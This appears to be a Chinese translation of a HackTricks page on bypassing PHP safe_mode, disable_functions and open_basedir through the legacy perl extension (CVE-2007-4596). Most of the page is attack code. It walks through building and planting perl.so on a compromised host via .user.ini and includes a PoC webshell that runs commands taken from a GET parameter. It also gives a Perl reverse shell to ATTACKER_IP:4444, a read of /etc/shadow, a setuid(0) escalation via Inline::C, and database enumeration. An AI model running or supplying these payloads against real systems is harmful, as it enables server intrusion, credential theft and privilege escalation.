PHP Perl 扩展 Safe_mode 绕过 Exploit

Tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

背景

编号为 CVE-2007-4596 的问题源自遗留的 perl PHP 扩展,该扩展嵌入了完整的 Perl 解释器,却不遵守 PHP 的 safe_modedisable_functionsopen_basedir 控制。任何加载了 extension=perl.so 的 PHP worker 都能获得不受限制的 Perl eval,因此即使所有常见的 PHP 进程生成原语被阻断,命令执行仍然非常容易。虽然 safe_mode 在 PHP 5.4 中已移除,许多过时的共享主机堆栈和易受攻击的实验环境仍然提供它,因此当你进入遗留控制面板时,这个绕过依然有价值。

兼容性与打包状态(2025)

  • 最后一个 PECL 发布 (perl-1.0.1, 2013) 针对 PHP ≥5.0;由于 Zend APIs 已更改,PHP 8+ 通常无法使用。
  • PECL 正被 PIE 取代,但旧的堆栈仍然包含 PECL/pear。在 PHP 5/7 目标上使用下面的流程;针对更新的 PHP 版本,预计需要降级或切换到其他注入路径(例如 userland FFI)。

在 2025 年 构建可测试环境

  • 从 PECL 获取 perl-1.0.1,为你计划攻击的 PHP 分支编译,并在全局加载(php.ini)或通过 dl() 加载(如果允许)。
  • 基于 Debian 的快速实验室配置:
sudo apt install php5.6 php5.6-dev php-pear build-essential
sudo pecl install perl-1.0.1
echo "extension=perl.so" | sudo tee /etc/php/5.6/mods-available/perl.ini
sudo phpenmod perl && sudo systemctl restart apache2
  • 在利用过程中通过 var_dump(extension_loaded('perl'));print_r(get_loaded_extensions()); 确认可用性。如果不存在,搜索 perl.so 或滥用可写的 php.ini/.user.ini 条目以强制加载它。
  • 由于解释器驻留在 PHP worker 内部,不需要外部二进制——网络出口过滤或 proc_open 黑名单都无关紧要。

当 phpize 可用时的主机上构建链

如果在被攻陷的主机上存在 phpize 和 build-essential,你可以在不外壳执行 OS 命令的情况下编译并部署 perl.so

# grab the tarball from PECL
wget https://pecl.php.net/get/perl-1.0.1.tgz
tar xvf perl-1.0.1.tgz && cd perl-1.0.1
phpize
./configure --with-perl=/usr/bin/perl --with-php-config=$(php -r 'echo PHP_BINARY;')-config
make -j$(nproc)
cp modules/perl.so /tmp/perl.so
# then load with a .user.ini in the webroot if main php.ini is read-only
echo "extension=/tmp/perl.so" > /var/www/html/.user.ini

如果启用了 open_basedir,确保放置的 .user.ini.so 位于允许的路径内;extension= 指令在 basedir 内仍然生效。编译流程遵循 PHP 手册中关于构建 PECL 扩展的说明。

原始 PoC (NetJackal)

来自 http://blog.safebuff.com/2016/05/06/disable-functions-bypass/,仍然有助于确认扩展对 eval 有响应:

<?php
if(!extension_loaded('perl'))die('perl extension is not loaded');
if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls';
$perl=new perl();
echo "<textarea rows='25' cols='75'>";
$perl->eval("system('".$_GET['cmd']."')");
echo "&lt;/textarea&gt;";
$_GET['cmd']=htmlspecialchars($_GET['cmd']);
echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>";
?>

现代 Payload 增强

1. 通过 TCP 获取完整的 TTY

嵌入的解释器可以加载 IO::Socket,即使 /usr/bin/perl 被阻止:

$perl = new perl();
$payload = <<<'PL'
use IO::Socket::INET;
my $c = IO::Socket::INET->new(PeerHost=>'ATTACKER_IP',PeerPort=>4444,Proto=>'tcp');
open STDIN,  '<&', $c;
open STDOUT, '>&', $c;
open STDERR, '>&', $c;
exec('/bin/sh -i');
PL;
$perl->eval($payload);

2. 即使启用 open_basedir 的文件系统逃逸

Perl 忽略 PHP 的 open_basedir,因此你可以读取任意文件:

$perl = new perl();
$perl->eval('open(F,"/etc/shadow") || die $!; print while <F>; close F;');

通过 IO::Socket::INETNet::HTTP 将输出管道化,以在不接触 PHP 管理的描述符的情况下 exfiltrate 数据。

3. 内联编译用于权限提升

如果系统范围内存在 Inline::C,则可以在请求内部编译辅助函数,而无需依赖 PHP 的 ffipcntl

$perl = new perl();
$perl->eval(<<<'PL'
use Inline C => 'DATA';
print escalate();
__DATA__
__C__
char* escalate(){ setuid(0); system("/bin/bash -c 'id; cat /root/flag'"); return ""; }
PL
);

4. Living-off-the-Land Enumeration

将 Perl 当作一个 LOLBAS toolkit 使用——例如,即使没有 mysqli,也可以导出 MySQL DSNs:

$perl = new perl();
$perl->eval('use DBI; @dbs = DBI->data_sources("mysql"); print join("\n", @dbs);');

参考资料

Tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks